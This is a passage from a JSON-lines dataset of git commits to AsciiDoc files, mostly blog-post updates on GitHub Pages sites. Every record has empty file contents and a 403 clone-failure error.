2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14b6be6cfd0d808f6f7f7582123a2aabf2555958","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f61a2307d4dc73792e8b6c23d3008af1be72fe14","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f8e9135e0bba744dccb56345fbe82ba01818eb4","subject":"Update 2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","message":"Update 2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","new_file":"_posts\/2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c98f095b8976978fb55fdaa8495ad362d4f326f","subject":"Update 2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","message":"Update 2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a15c79dcb95169c98486d77ac069c3d9aa2be7ad","subject":"Update 2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","message":"Update 2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","new_file":"_posts\/2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71c0009f205cb7960f9e2a6875f08287df49b355","subject":"Fix link to Bus jira","message":"Fix link to Bus jira\n","repos":"tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9095abe2b53ffc43a6db3fb31c5034b674f79970","subject":"Add README to hoverfly-java-junit5","message":"Add README to hoverfly-java-junit5\n\n\nFormer-commit-id: 2af43a670a3f2ec487fd45d56dcd4765b9f06e03","repos":"SpectoLabs\/hoverfly-java,SpectoLabs\/hoverfly-java,SpectoLabs\/hoverfly-java","old_file":"junit5\/README.adoc","new_file":"junit5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SpectoLabs\/hoverfly-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"769971a29bb1ad6df0ed96da1d12f319f22330f4","subject":"ISIS-2062: copied Andi's notes on ConcurrentTaskList","message":"ISIS-2062: copied Andi's notes on ConcurrentTaskList\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/archdesign\/modules\/ROOT\/pages\/concurrent-task-list.adoc","new_file":"antora\/components\/archdesign\/modules\/ROOT\/pages\/concurrent-task-list.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ea2c6554c8e8397dd948cde5102a24b04b8e711","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b0ec3187017758581f8baf27aa2a1b7988bcd0d","subject":"Update 2019-09-09-Model-Distillation.adoc","message":"Update 2019-09-09-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-09-Model-Distillation.adoc","new_file":"_posts\/2019-09-09-Model-Distillation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82b6a10a279cab2c58f7eafc7533b881cee7845","subject":"Update 2019-01-31-nagegacao-com-tabview.adoc","message":"Update 2019-01-31-nagegacao-com-tabview.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2019-01-31-nagegacao-com-tabview.adoc","new_file":"_posts\/2019-01-31-nagegacao-com-tabview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5dcda327a33756449db55fe0472c41e3d49d011","subject":"Common Snippet - App Engine deployment configuration","message":"Common Snippet - App Engine deployment configuration\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-appenginedeploymentconfiguration.adoc","new_file":"src\/main\/docs\/common-appenginedeploymentconfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff185313f23669face9078c12d6c1b20acfac420","subject":"docs: user guide","message":"docs: user guide\n\nChange-Id: I29f99c4a43a04ef5a1377ca2b20bb16332423771\n","repos":"default-to-open\/rpmgrill,thrix\/rpmgrill,thrix\/rpmgrill,default-to-open\/rpmgrill","old_file":"doc\/user_guide\/main.asciidoc","new_file":"doc\/user_guide\/main.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrix\/rpmgrill.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"4ad8124175ad14f5acbfdd8e6fa6e99c51fe0023","subject":"Second batch of changes to the baseDoc file","message":"Second batch of changes to the baseDoc file\n","repos":"ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e6e05827810a9562dd32a5a3c344de0bb8c6909","subject":"Update 2017-05-20-Episode-99-A-Mother-of-Days.adoc","message":"Update 2017-05-20-Episode-99-A-Mother-of-Days.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-20-Episode-99-A-Mother-of-Days.adoc","new_file":"_posts\/2017-05-20-Episode-99-A-Mother-of-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c50c8f5dffadf62e897c70943d2105fd6588b324","subject":"Add \"How to contribute to OpenSCAP\" document","message":"Add \"How to contribute to OpenSCAP\" document\n\nThis little how-to can help new Red Hat interns and contributors with basic\nquestions that I have in the beginnings.\n","repos":"Hexadorsimal\/openscap,mpreisler\/openscap,openprivacy\/openscap,ybznek\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,jan-cerny\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,redhatrises\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,openprivacy\/openscap,mpreisler\/openscap,redhatrises\/openscap,ybznek\/openscap,openprivacy\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,openprivacy\/openscap,openprivacy\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,jan-cerny\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,ybznek\/openscap,mpreisler\/openscap","old_file":"docs\/contribute\/contribute.adoc","new_file":"docs\/contribute\/contribute.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a08a594674ad4f45837bc3c8ff05416c46bc1c63","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df661bb708e7e1c6b88e1ef1ac8c873b95ef47d1","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"943d25bae64866a78ccad305f4a595a2976e7ae8","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-The-Invisible-iPhone-Button.adoc","new_file":"_posts\/2017-11-27-The-Invisible-iPhone-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"854102c6e666b85667fbdb0510ba80070ee921e8","subject":"Change the URL for the instructions to install ccm; the actual repo is the official documentation. (#227)","message":"Change the URL for the instructions to install ccm; the actual repo is the official documentation. (#227)\n\n","repos":"pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/installation-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/installation-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2f8d98c4467c3deb410cf4af5234d137dc1ed38","subject":"Update 2015-06-02-Everything-I-tell-you-is-wrong.adoc","message":"Update 2015-06-02-Everything-I-tell-you-is-wrong.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-06-02-Everything-I-tell-you-is-wrong.adoc","new_file":"_posts\/2015-06-02-Everything-I-tell-you-is-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b1ff9370bbb4217dbf1ff2098e5a62f18daad3","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9717c2d7fef7ccc780172ea48bd479be7e0d97c4","subject":"Add the stickler-server manpage","message":"Add the stickler-server manpage","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"man\/stickler-server.asciidoc","new_file":"man\/stickler-server.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68c4e9dd794cae9a5d8de8a80782d76b741a5064","subject":"Update 2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","message":"Update 2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","new_file":"_posts\/2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fab8f7b9f69e9ab732f2acd8881d4416d7f5c42","subject":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22567956accfc988c26635dca863e53f4673859","subject":"y2b create post Unboxing The Mind Bending Wallpaper TV...","message":"y2b create post Unboxing The Mind Bending Wallpaper TV...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-01-Unboxing-The-Mind-Bending-Wallpaper-TV.adoc","new_file":"_posts\/2017-10-01-Unboxing-The-Mind-Bending-Wallpaper-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6ae1b8f77fb1bfbd6a5c0e9b7191473bf65687a","subject":"Update 2012-07-27-Berlin-la-trilogie.adoc","message":"Update 2012-07-27-Berlin-la-trilogie.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2012-07-27-Berlin-la-trilogie.adoc","new_file":"_posts\/2012-07-27-Berlin-la-trilogie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a576b126b8b9d3db862432feaa782023a9533651","subject":"Update 2015-06-15-NodeJSs-event-loop.adoc","message":"Update 2015-06-15-NodeJSs-event-loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cbdf2a55bf66d4d3aa0e08ab362d02669213e2b","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b23a524eee95a3f3bd166e4b01c707c0492bb44","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"Acidburn0zzz\/winreg-kb,libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Registry files.asciidoc","new_file":"documentation\/Registry files.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"460c879548a126a37836aad5891cd3b3c8b6b4a2","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f95ac4ff280757e78bfdd7e72ad47c248c480a0d","subject":"Update 2016-03-12-Cutting-the-Strings.adoc","message":"Update 2016-03-12-Cutting-the-Strings.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Cutting-the-Strings.adoc","new_file":"_posts\/2016-03-12-Cutting-the-Strings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06e396cba6a0bcad92a150c63d4a9529297d7fa1","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367db74430f5e49e554d3d4a3582b3f315fc380a","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3788d818fc4303c55d2b7ac94bf6358fca05c29","subject":"Added link to forum topic for lemur","message":"Added link to forum topic for lemur\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/gui\/topic_contributions.adoc","new_file":"docs\/modules\/contributions\/pages\/gui\/topic_contributions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"255faf60c5a13eed5317a09a3c7f13eef3edb396","subject":"Update 2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","message":"Update 2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","new_file":"_posts\/2016-05-10-Instrumentarij-dlya-razrabotki-JavaEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ee6b24e289e179a3c3d4197f3198df53193576d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"111f97839b11564b69e19080cc33daf2d4d77a52","subject":"Update and rename news to news\/2015-03-04-forge-2.15.0.final.asciidoc","message":"Update and rename news to news\/2015-03-04-forge-2.15.0.final.asciidoc","repos":"luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2015-03-04-forge-2.15.0.final.asciidoc","new_file":"news\/2015-03-04-forge-2.15.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f73e334362283ca62f52d7fe852645b3edb8fdd9","subject":"Update 2016-08-29-My-First-post-on-hubpressio.adoc","message":"Update 2016-08-29-My-First-post-on-hubpressio.adoc","repos":"ErJ101\/hbspractise,ErJ101\/hbspractise,ErJ101\/hbspractise,ErJ101\/hbspractise","old_file":"_posts\/2016-08-29-My-First-post-on-hubpressio.adoc","new_file":"_posts\/2016-08-29-My-First-post-on-hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 